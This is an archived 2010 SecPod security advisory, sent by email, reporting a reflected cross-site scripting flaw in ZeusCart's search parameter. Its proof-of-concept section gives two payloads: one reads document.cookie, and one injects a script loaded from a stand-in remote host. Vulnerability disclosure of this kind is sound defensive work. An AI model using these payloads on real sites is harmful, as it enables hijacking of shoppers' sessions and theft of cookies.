Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: e-commerce, shopping carts :: b1a-1653.htm

ZeusCart Ecommerce Shopping Cart Software Cross-Site scripting Vulnerability



ZeusCart Ecommerce Shopping Cart Software Cross-Site scripting Vulnerability
ZeusCart Ecommerce Shopping Cart Software Cross-Site scripting Vulnerability



This is a multi-part message in MIME format.
--------------080708030908070203040203
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit

Hi,

SecPod Research Team has found new vulnerability in ZeusCart Ecommerce 
Shopping Cart Software.

Advisory details has been attached to this mail.


Regards,
SecPod Research Team
http://www.secpod.com/ 


--------------080708030908070203040203
Content-Type: text/plain;
 name="SECPOD_ZeusCart_XSS.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
 filename="SECPOD_ZeusCart_XSS.txt"

#######################################################################
ZeusCart Ecommerce Shopping Cart Software Cross-Site scripting Vulnerability

SecPod Technologies (www.secpod.com) 
Author Sooraj K.S
#######################################################################

SecPod ID:	1003			07/28/2010 Issue Discovered
				        07/30/2010 Vendor Notified
				        No Response from Vendor

Class: Cross-Site Scripting		Severity: Medium


Overview:
---------
ZeusCart Ecommerce Shopping Cart Software is prone to cross-site scripting
vulnerability.

Technical Description:
----------------------
ZeusCart Ecommerce Shopping Cart Software is prone to a cross-site scripting
vulnerability because it fails to properly sanitize user-supplied input.

Input passed via the 'search' parameter in a 'search' action in index.php is
not properly verified before it is returned to the user. This can be exploited
to execute arbitrary HTML and script code in a user's browser session in the
context of a vulnerable site. This may allow the attacker to steal cookie-based
authentication credentials and to launch other attacks.

The vulnerability has been tested in ZeusCart 3.0 and 2.3. Other versions may
also be affected.
 

Impact:
--------
Successful exploitation allows an attacker to execute arbitrary HTML and script
code in a user's browser session in the context of a vulnerable site.


Affected Software:
------------------
ZeusCart 3.0
ZeusCart 2.3

Tested on,
ZeusCart 3.0 and 2.3 (tested using Microsoft Internet Explorer browser)


Reference:
---------
http://www.zeuscart.com/ 
http://secpod.org/blog/?p=109 
http://secpod.org/advisories/SECPOD_ZeusCart_XSS.txt 


Proof of Concept:
-----------------
1)Input this code in search box and click search
'"%22%20style=x:expression(alert(document.cookie))><"
This script executed only on Microsoft Internet Explorer browser when tested
on ZeusCart 3.0 and 2.3

2) This example worked on ZeusCart version 2.3
http://www.example.com/?do=search&search='"> SRC=//REMOTE_SITE_SCRIPT> 

Solution:
----------
Fix not available

Risk Factor:
-------------
    CVSS Score Report: 
        ACCESS_VECTOR          = NETWORK
        ACCESS_COMPLEXITY      = MEDIUM
        AUTHENTICATION         = NONE
        CONFIDENTIALITY_IMPACT = NONE
        INTEGRITY_IMPACT       = PARTIAL
        AVAILABILITY_IMPACT    = NONE
        EXPLOITABILITY         = PROOF_OF_CONCEPT
        REMEDIATION_LEVEL      = UNAVAILABLE
        REPORT_CONFIDENCE      = CONFIRMED
        CVSS Base Score        = 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)

Credits:
--------
Sooraj K.S of SecPod Technologies has been credited with the discovery of this
vulnerability.



--------------080708030908070203040203--


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH